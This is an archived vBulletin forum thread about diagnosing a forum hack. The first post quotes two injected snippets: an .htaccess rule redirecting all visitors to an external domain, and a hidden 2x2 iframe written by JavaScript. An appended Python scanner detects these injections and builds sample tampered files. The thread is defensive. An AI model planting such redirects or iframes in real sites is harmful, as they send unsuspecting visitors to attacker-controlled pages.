The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!
#1
Looking to dig deeper into how forum was hacked
Hey,
for a second time, our forum has been hacked. The following happens:
The .htaccess file included this new line:
Code:
```
RewriteRule ^.*$ http://senior-fun-shooters.de/mccd.html?h=XXX [L,R]
```
Code:
```
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://senior-fun-shooters.de/mccd.html?j=XXX></iframe>');
```
This is the second time this has happened, so I suspect there's a known hack allowing these changes to be made. It could be a server permissions problem on our side too. Do you have any pointers for where this hack is already discussed?
#2
Are you on dedicated or shared hosting? Sounds like the hosting environment is not secure...
#3
It is on our virtual private server, so we do control the permissions (that's not to say that our permissions are all set correctly...)
#4
Why don't you start with posting permissions for the directories and also the hosting environment's OS, current security modules installed, etc.?
#5
Permissions for the forum folder itself and its subfolders are `drwxr-xr-x`.
It's running on CentOS Linux. As it's a managed server, I don't have specifics on current security modules installed. Is what I mentioned a known security hack? You are still of the mind that this could be prevented by correct folder permissions, am I right?
#6
Have you checked your server logs to find the IP of the person who did this? Then check your access_logs for that IP and see what they did on your site.
#7
Do what Lynne said also. Access and server logs will tell you how and what happened. Most website vulnerabilities are due to the host not setting up a secure environment....
#8
Thanks for all the advice.
Our Apache logs certainly show the time the 404 responses began to spring up. However, there does not seem to be more access information than that. I could be wrong, of course, and we'll seek the help of an expert in the area of Linux.
#9
I can confirm that this hack took place through FTP access.
That means it was not a mal-configured server or vBulletin's fault. How the strong FTP password was cracked is another question. It was an account created specifically for a past vBulletin contractor. Either the password was brute-force guessed (which I don't suspect), or the contractor's machine or FTP communication with our server was compromised.
#10
Lock down FTP access to allow access from only known, trusted IP addresses through your firewall. You should be able to do that through your server control panel.
And actually on a running site that isn't being updated for any reason, there's no reason to allow any FTP access to the server at all.
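Since this was the second defacement, a sweep of the web root for the two injections quoted in the first post shows whether any tampered files remain once FTP is locked down. The sketch below is an added example, not code from any poster in this thread; the function names, the scanned file extensions, and the sample hosts `www.forum.example` and `injected.example` are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Redirect/rewrite directive whose target is an absolute (possibly off-site) URL.
HTACCESS_REDIRECT = re.compile(
    r"^\s*(RewriteRule|Redirect(?:Match)?)\s+.*?\bhttps?://([^/\s\"']+)", re.I | re.M)
# document.write() that emits an <iframe> loading from an absolute URL.
JS_IFRAME = re.compile(
    r"document\.write\s*\(\s*['\"]\s*<iframe\b[^>]*\bsrc\s*=\s*['\"]?https?://([^/\s\"'>]+)",
    re.I)

def scan(webroot, own_hosts=()):
    """Return sorted (relative path, kind, host) findings that point off-site."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for path in Path(webroot).rglob("*"):  # pathlib's "*" also matches dotfiles
        if not path.is_file():
            continue
        if path.name == ".htaccess":
            kind, pattern = "htaccess-redirect", HTACCESS_REDIRECT
        elif path.suffix.lower() in {".js", ".php", ".html", ".htm"}:  # assumed set
            kind, pattern = "iframe-write", JS_IFRAME
        else:
            continue
        text = path.read_text(errors="replace")
        for m in pattern.finditer(text):
            host = m.group(m.lastindex).lower()  # last group is always the host
            if host not in own:  # redirects to the site's own hosts are expected
                findings.append((str(path.relative_to(webroot)), kind, host))
    return sorted(findings)

def build_sample(root):
    """Write a constructed sample tree: clean files beside tampered ones."""
    js = Path(root) / "forum" / "clientscript"
    js.mkdir(parents=True)
    (Path(root) / ".htaccess").write_text(
        "RewriteEngine On\nRewriteRule ^(.*)$ http://www.forum.example/$1 [L,R=301]\n")
    (Path(root) / "forum" / ".htaccess").write_text(
        "RewriteRule ^.*$ http://injected.example/x.html?h=XXX [L,R]\n")
    (js / "menu.js").write_text(
        "function menu() {}\ndocument.write('<iframe height=2 width=2 "
        "src=http://injected.example/x.html?j=XXX></iframe>');\n")
    (js / "clean.js").write_text("document.write('<b>hi</b>');\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_sample(d)
        for finding in scan(d, own_hosts={"www.forum.example"}):
            print(*finding, sep="\t")
```

Run against the real document root with the site's own hostnames in `own_hosts`; the modification times of any flagged files give the window to look up in the FTP and access logs.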